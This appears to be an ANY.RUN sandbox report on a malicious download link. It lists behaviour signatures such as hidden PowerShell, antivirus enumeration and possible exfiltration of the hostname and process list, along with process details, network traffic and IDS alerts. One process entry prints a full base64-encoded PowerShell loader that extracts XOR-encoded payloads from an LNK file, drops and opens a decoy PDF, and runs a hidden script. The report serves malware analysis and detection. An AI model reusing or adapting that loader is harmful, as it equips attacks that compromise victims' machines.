URL:

https://www.swisstransfer.com/d/2b022b28-0a8d-4576-ae99-086875982c8b

Full analysis: https://app.any.run/tasks/30b678d6-13b6-4a23-a3d2-bda8c50baa2c
Verdict: Malicious activity
Analysis date: August 13, 2026, 13:00:47
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
susp-lnk
evasion
Indicators:
MD5:

8C377FC4C86161A453D61F5840AF6C76

SHA1:

54562BDC2FB1CA73337CD89A03535F76C8B32554

SHA256:

61802C04497F157443CAFE62B964F224953C527938AAB3D3845ACC058FCD5AE8

SSDEEP:

3:N8DSL0KMXtabjA63Tsc:2OL0NXobjADc

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 7536)
      • powershell.exe (PID: 5236)
      • powershell.exe (PID: 7984)
      • powershell.exe (PID: 8204)
      • powershell.exe (PID: 8652)
      • powershell.exe (PID: 8144)
    • Enumerates installed antivirus status via Win32_AntivirusProduct (SCRIPT)

      • powershell.exe (PID: 8144)
      • powershell.exe (PID: 7536)
      • powershell.exe (PID: 5236)
    • Changes powershell execution policy (Bypass)

      • powershell.exe (PID: 8144)
      • powershell.exe (PID: 7536)
      • powershell.exe (PID: 5236)
      • WinRAR.exe (PID: 7804)
  • SUSPICIOUS

    • The process bypasses the loading of PowerShell profile settings

      • WinRAR.exe (PID: 7804)
      • powershell.exe (PID: 8144)
      • powershell.exe (PID: 7536)
      • powershell.exe (PID: 5236)
    • BASE64 encoded PowerShell command has been detected

      • WinRAR.exe (PID: 7804)
    • Base64-obfuscated command line is found

      • WinRAR.exe (PID: 7804)
    • Queries Computer System Information (Win32_ComputerSystem) (SCRIPT)

      • powershell.exe (PID: 8144)
      • powershell.exe (PID: 7536)
      • powershell.exe (PID: 5236)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 8144)
      • powershell.exe (PID: 7536)
      • powershell.exe (PID: 5236)
      • powershell.exe (PID: 7984)
      • powershell.exe (PID: 8204)
      • powershell.exe (PID: 8652)
    • Gets content of a file (POWERSHELL)

      • powershell.exe (PID: 8144)
      • powershell.exe (PID: 7536)
      • powershell.exe (PID: 5236)
    • Application launched itself

      • powershell.exe (PID: 8144)
      • powershell.exe (PID: 7536)
      • powershell.exe (PID: 5236)
    • Starts POWERSHELL.EXE for commands execution

      • powershell.exe (PID: 8144)
      • powershell.exe (PID: 7536)
      • powershell.exe (PID: 5236)
      • WinRAR.exe (PID: 7804)
    • Starts a new process with hidden mode (POWERSHELL)

      • powershell.exe (PID: 7984)
      • powershell.exe (PID: 8204)
      • powershell.exe (PID: 8652)
  • INFO

    • Launching a file from the Downloads directory

      • chrome.exe (PID: 1896)
    • Application launched itself

      • chrome.exe (PID: 1896)
      • Acrobat.exe (PID: 8336)
      • Acrobat.exe (PID: 8548)
      • AcroCEF.exe (PID: 8880)
    • Gets a random number, or selects objects randomly from a collection (POWERSHELL)

      • powershell.exe (PID: 8144)
      • powershell.exe (PID: 7536)
      • powershell.exe (PID: 5236)
      • powershell.exe (PID: 7984)
      • powershell.exe (PID: 8204)
      • powershell.exe (PID: 8652)
    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 8144)
      • powershell.exe (PID: 7536)
      • powershell.exe (PID: 5236)
    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 8144)
      • powershell.exe (PID: 7536)
      • powershell.exe (PID: 5236)
      • powershell.exe (PID: 7984)
      • powershell.exe (PID: 8204)
    • Reads security settings of Internet Explorer

      • WinRAR.exe (PID: 7804)
      • OpenWith.exe (PID: 7632)
    • Reads Microsoft Office registry keys

      • OpenWith.exe (PID: 4052)
      • OpenWith.exe (PID: 7632)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 5236)
      • powershell.exe (PID: 8204)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 7984)
      • powershell.exe (PID: 8204)
      • powershell.exe (PID: 8652)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 7984)
      • powershell.exe (PID: 8204)
      • powershell.exe (PID: 8652)
    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 7984)
      • powershell.exe (PID: 8204)
      • powershell.exe (PID: 8652)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
195
Monitored processes
59
Malicious processes
8
Suspicious processes
1

Behavior graph

Click at the process to see the details

Process information

PID
CMD
Path
Indicators
Parent process
308"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=3 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3988,i,7523864708291793772,16296630562669619689,262144 --disable-features=HttpsFirstBalancedMode,HttpsFirstModeV2,HttpsOnlyMode,HttpsUpgrades --variations-seed-version=20251218-201203.402000 --mojo-platform-channel-handle=3992 /prefetch:2C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Version:
133.0.6943.127
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\133.0.6943.127\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
1896"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-features=HttpsUpgrades,HttpsFirstModeV2,HttpsOnlyMode,HttpsFirstBalancedMode --no-first-run --no-default-browser-check https://www.swisstransfer.com/d/2b022b28-0a8d-4576-ae99-086875982c8bC:\Program Files\Google\Chrome\Application\chrome.exe
explorer.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Version:
133.0.6943.127
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
2244C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
2840"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=3 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3184,i,7523864708291793772,16296630562669619689,262144 --disable-features=HttpsFirstBalancedMode,HttpsFirstModeV2,HttpsOnlyMode,HttpsUpgrades --variations-seed-version=20251218-201203.402000 --mojo-platform-channel-handle=3208 /prefetch:1C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Version:
133.0.6943.127
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\133.0.6943.127\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
2864"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=renderer --log-severity=disable --user-agent-product="ReaderServices/23.1.20093 Chrome/105.0.0.0" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --touch-events=enabled --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=3 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=2980 --field-trial-handle=1660,i,10014784720932243290,3041133320626333384,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:1C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeAcroCEF.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
LOW
Description:
Adobe AcroCEF
Version:
23.1.20093.0
Modules
Images
c:\program files\adobe\acrobat dc\acrobat\acrocef_1\acrocef.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
4052C:\WINDOWS\system32\OpenWith.exe -EmbeddingC:\Windows\System32\OpenWith.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Pick an app
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\openwith.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
4688"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --disable-quic --string-annotations --field-trial-handle=2076,i,7523864708291793772,16296630562669619689,262144 --disable-features=HttpsFirstBalancedMode,HttpsFirstModeV2,HttpsOnlyMode,HttpsUpgrades --variations-seed-version=20251218-201203.402000 --mojo-platform-channel-handle=2240 /prefetch:3C:\Program Files\Google\Chrome\Application\chrome.exe
chrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Version:
133.0.6943.127
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
5236"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand JABsAEoAIAA9ACAARwBlAHQALQBMAG8AYwBhAHQAaQBvAG4AOwANAAoAJABMAFoAQQAgAD0AIABKAG8AaQBuAC0AUABhAHQAaAAgACQAbABKACAAKAAnAEMAbwBtAHAAYQBuAHkAXwBXAGUAYgBzAGkAdABlAF8ARABlAHYAZQBsAG8AcABtAGUAbgB0AF8AUAByAG8AagBlAGMAdAAuAHAAZABmAC4AbABuAGsAJwApADsADQAKACQAUABqACAAPQAgACQAZQBuAHYAOgBUAEUATQBQADsADQAKAGkAZgAgACgALQBuAG8AdAAoAFQAZQBzAHQALQBQAGEAdABoACAAJABMAFoAQQApACkAIAB7AA0ACgAgACAAIAAgACQARABEAHMAIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgACQAUABqACAALQByAEUAQwBVAFIAUwBFACAALQBFAFIAcgBPAHIAYQBDAFQASQBvAE4AIABTAEkATABlAE4AdABMAHkAQwBvAG4AVABpAG4AdQBFACAAfAAgAHcAaABlAHIAZQAtAE8AYgBKAEUAYwB0ACAAewAgACQAXwAuAG4AQQBtAEUAIAAtAGUAUQAgACcAQwBvAG0AcABhAG4AeQBfAFcAZQBiAHMAaQB0AGUAXwBEAGUAdgBlAGwAbwBwAG0AZQBuAHQAXwBQAHIAbwBqAGUAYwB0AC4AcABkAGYALgBsAG4AawAnACAAfQAgAHwAIABzAG8AUgB0AC0AbwBiAEoARQBDAHQAIABsAEEAUwBUAFcAUgBpAFQARQB0AEkATQBFACAALQBEAEUAcwBDAGUAbgBkAEkAbgBHACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYASQByAHMAVAAgADEAOwANAAoAIAAgACAAIABJAGYAIAAoACQARABEAHMAKQAgAHsAIAAkAEwAWgBBACAAPQAgACQARABEAHMALgBmAHUATABMAE4AYQBtAEUAOwAgAH0AIABlAGwAcwBlACAAewAgAGUAeABpAHQAOwAgAH0ADQAKAH0AOwANAAoAJABsAEoAIAA9ACAAUwBwAGwAaQB0AC0AUABhAHQAaAAgAC0AUABhAHIAZQBuAHQAIAAkAEwAWgBBADsADQAKAGYAdQBuAGMAdABpAG8AbgAgAHAAbAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAJABIAEMAQwAsACAAJABtAHQANgAsACAAJAB2AHUALAAgACQAYgBZAGgAIAA9ACAAJABuAHUAbABsACkADQAKACAAIAAgACAAJABCAGUAWAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAG0AdAA2ADsAIAANAAoAIAAgACAAIAAkAE4AVABHACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AE8AcABlAG4AUgBlAGEAZAAoACQATABaAEEAKQA7AA0ACgAgACAAIAAgACQAbgB1AGwAbAAgAD0AIAAkAE4AVABHAC4AUwBlAGUAawAoACQASABDAEMALAAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBTAGUAZQBrAE8AcgBpAGcAaQBuAF0AOgA6AEIAZQBnAGkAbgApADsADQAKACAAIAAgACAAJABuAHUAbABsACAAPQAgACQATgBUAEcALgBSAGUAYQBkACgAJABCAGUAWAAsACAAMAAsACAAJABtAHQANgApADsADQAKACAAIAAgACAAJABOAFQARwAuAEMAbABvAHMAZQAoACkAOwANAAoAIAAgACAAIABpAGYAIAAoACQAdgB1ACAALQBuAGUAIAAwACkAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAZgBPAFIAIAAoACQAQQAyAEEAIAA9ACAAMAA7ACAAJABBADIAQQAgAC0ATABUACAAJABtAHQANgA7ACAAJABBADIAQQArACsAKQAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFsAdgBvAGkAZABdACgAJABCAGUAWABbACQAQQAyAEEAXQAgAD0AIAAkAEIAZQBYAFsAJABBADIAQQBdACAALQBiAHgAbwByACAAJAB2AHUAKQA7AA0ACgAgACAAIAAgACAAIAAgACAAfQA7AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAkAGIAWQBoACkAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAUwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAJABiAFkAaAAgACQAQgBlAFgAIAAtAEUAbgBjAG8AZABpAG4AZwAgAEIAeQB0AGUAOwANAAoAIAAgACAAIAB9ACAAZQBsAHMAZQAgAHsADQAKACAAIAAgACAAIAAgACAAIAByAGUAdAB1AHIAbgAgACwAJABCAGUAWAA7AA0ACgAgACAAIAAgAH0ADQAKAH0AOwANAAoAJABBADEAIAA9ACAASgBvAGkAbgAtAFAAYQB0AGgAIAAkAGwASgAgACgAJwBDAG8AbQBwAGEAbgB5AF8AVwBlAGIAcwBpAHQAZQBfAEQAZQB2AGUAbABvAHAAbQBlAG4AdABfAFAAcgBvAGoAZQBjAHQALgBwAGQAZgAnACkAOwANAAoAcABsACAAMgA2ADgAMgAzACAAMgA0ADUAMAAzACAAMQA1ADgAIAAkAEEAMQA7AA0ACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABBADEAOwANAAoAJABwAFkAOAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAGIAeQB0AGUAWwBdAF0AKABwAGwAIAAxADIAMgA4ADgAIAAxADQANQAzADUAIAAyADMAMQApACkAOwANAAoAJAB3ADMARAAgAD0AIABKAG8AaQBuAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAEUATQBQACAAKAAoAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGEAdABoAF0AOgA6AEcAZQB0AFIAYQBuAGQAbwBtAEYAaQBsAGUATgBhAG0AZQAoACkAKQAgACsAIAAnAC4AcABzADEAJwApADsADQAKAFMAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAdwAzAEQAIAAtAFYAYQBsAHUAZQAgACQAcABZADgAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgAIAAtAEYAbwByAGMAZQA7AA0ACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AVwBhAGkAdAAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIABAACgAJwAtAE4AbwBQAHIAbwBmAGkAbABlACcALAAgACcALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAJwAsACAAJwBIAGkAZABkAGUAbgAnACwAIAAnAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAJwAsACAAJwBCAHkAcABhAHMAcwAnACwAIAAnAC0ARgBpAGwAZQAnACwAIAAkAHcAMwBEACkAOwANAAoAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJAB3ADMARAAgAC0ARgBvAHIAYwBlACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlADsADQAKAFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQATABaAEEAIAAtAEYAbwByAGMAZQA7AA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5636"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=3 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3200,i,7523864708291793772,16296630562669619689,262144 --disable-features=HttpsFirstBalancedMode,HttpsFirstModeV2,HttpsOnlyMode,HttpsUpgrades --variations-seed-version=20251218-201203.402000 --mojo-platform-channel-handle=3252 /prefetch:1C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Version:
133.0.6943.127
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\133.0.6943.127\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
5664"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.127 --initial-client-data=0x220,0x224,0x228,0x1f8,0x1fc,0x7ff9ab71fff8,0x7ff9ab720004,0x7ff9ab720010C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Version:
133.0.6943.127
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
Total events
0
Read events
0
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
301
Text files
99
Unknown types
2

Dropped files

PID
Process
Filename
Type
1896chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\ClientCertificates\LOG.old~RF106207.TMP
MD5:
SHA256:
1896chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\ClientCertificates\LOG.old
MD5:
SHA256:
1896chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\LOG.old~RF106217.TMP
MD5:
SHA256:
1896chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\LOG.old
MD5:
SHA256:
1896chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\LOG.old~RF106227.TMP
MD5:
SHA256:
1896chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\LOG.old~RF106227.TMP
MD5:
SHA256:
1896chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\LOG.old
MD5:
SHA256:
1896chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\LOG.old~RF106227.TMP
MD5:
SHA256:
1896chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\LOG.old
MD5:
SHA256:
1896chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\LOG.old
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
208
TCP/UDP connections
96
DNS requests
69
Threats
7

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4688
chrome.exe
GET
200
192.178.183.139:80
http://clients2.google.com/time/1/current?cup2key=8:B8dYZSNvAlOXIo3b1-BtxFKstyt7TGPwIlhjU0RVuIk&cup2hreq=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
US
text
106 b
whitelisted
1072
svchost.exe
POST
403
23.52.181.141:443
https://go.microsoft.com/fwlink/?LinkID=2257403&clcid=0x409
US
html
386 b
whitelisted
1072
svchost.exe
POST
403
23.52.181.141:443
https://go.microsoft.com/fwlink/?LinkID=2257403&clcid=0x409
US
html
386 b
whitelisted
1072
svchost.exe
POST
403
23.52.181.141:443
https://go.microsoft.com/fwlink/?LinkID=2257403&clcid=0x409
US
html
386 b
whitelisted
1072
svchost.exe
POST
403
23.52.181.141:443
https://go.microsoft.com/fwlink/?LinkID=2257403&clcid=0x409
US
html
386 b
whitelisted
4688
chrome.exe
GET
200
172.217.119.4:443
https://safebrowsingohttpgateway.googleapis.com/v1/ohttp/hpkekeyconfig?key=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE
US
binary
41 b
whitelisted
4688
chrome.exe
GET
200
142.251.20.113:443
https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=133
US
compressed
100 Kb
whitelisted
4688
chrome.exe
POST
200
142.251.127.84:443
https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard
US
text
17 b
whitelisted
4688
chrome.exe
GET
200
185.125.25.84:443
https://www.swisstransfer.com/d/2b022b28-0a8d-4576-ae99-086875982c8b
CH
html
7.25 Kb
unknown
4688
chrome.exe
GET
200
185.125.25.84:443
https://www.swisstransfer.com/styles-QBVXM4ZU.css
CH
text
270 Kb
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
Not routed
whitelisted
5264
MoUsoCoreWorker.exe
48.209.138.189:443
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
6760
svchost.exe
40.126.32.138:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
172.211.123.250:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
2.16.241.203:443
AKAMAI-ASN1
NL
whitelisted
6928
svchost.exe
48.209.138.189:443
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
4
System
192.168.100.255:138
Not routed
whitelisted
1072
svchost.exe
23.52.181.141:443
go.microsoft.com
AKAMAI-AS
US
whitelisted
4688
chrome.exe
172.217.119.4:443
safebrowsingohttpgateway.googleapis.com
GOOGLE
US
whitelisted
4688
chrome.exe
192.178.183.139:80
clients2.google.com
GOOGLE
US
whitelisted

DNS requests

Domain
IP
Reputation
login.live.com
  • 40.126.32.138
  • 40.126.32.140
  • 20.190.160.3
  • 20.190.160.17
  • 20.190.160.66
  • 40.126.32.72
  • 40.126.32.133
  • 20.190.160.2
  • 20.190.160.131
  • 20.190.160.22
  • 40.126.32.136
  • 20.190.160.4
  • 20.190.160.5
whitelisted
client.wns.windows.com
  • 172.211.123.250
whitelisted
google.com
  • 142.251.20.113
  • 142.251.20.102
  • 142.251.20.138
  • 142.251.20.101
  • 142.251.20.100
  • 142.251.20.139
whitelisted
go.microsoft.com
  • 23.52.181.141
whitelisted
clients2.google.com
  • 192.178.183.139
  • 192.178.183.101
  • 192.178.183.102
  • 192.178.183.100
  • 192.178.183.138
  • 192.178.183.113
whitelisted
safebrowsingohttpgateway.googleapis.com
  • 172.217.119.4
  • 172.217.117.4
  • 172.217.118.4
  • 172.217.113.4
  • 172.217.116.4
  • 172.217.115.4
  • 172.217.114.4
  • 172.217.112.4
whitelisted
www.swisstransfer.com
  • 185.125.25.84
unknown
clientservices.googleapis.com
  • 142.251.20.113
  • 142.251.20.101
  • 142.251.20.139
  • 142.251.20.138
  • 142.251.20.100
  • 142.251.20.102
whitelisted
accounts.google.com
  • 142.251.127.84
whitelisted
www.google.com
  • 142.251.153.119
  • 142.251.152.119
  • 142.251.155.119
  • 142.251.156.119
  • 142.251.154.119
  • 142.251.151.119
  • 142.251.150.119
  • 142.251.157.119
whitelisted

Threats

PID
Process
Class
Message
7984
powershell.exe
Misc activity
HUNTING [ANY.RUN] Windows PC hostname observed in HTTP request
7984
powershell.exe
Misc activity
SUSPICIOUS [ANY.RUN] Sent Host Name in HTTP POST Body
7984
powershell.exe
A Network Trojan was detected
ET HUNTING Suspicious POST with Common Windows Process Names - Possible Process List Exfiltration
8204
powershell.exe
A Network Trojan was detected
ET HUNTING Suspicious POST with Common Windows Process Names - Possible Process List Exfiltration
8204
powershell.exe
Misc activity
HUNTING [ANY.RUN] Windows PC hostname observed in HTTP request
8652
powershell.exe
Misc activity
HUNTING [ANY.RUN] Windows PC hostname observed in HTTP request
8652
powershell.exe
A Network Trojan was detected
ET HUNTING Suspicious POST with Common Windows Process Names - Possible Process List Exfiltration
No debug info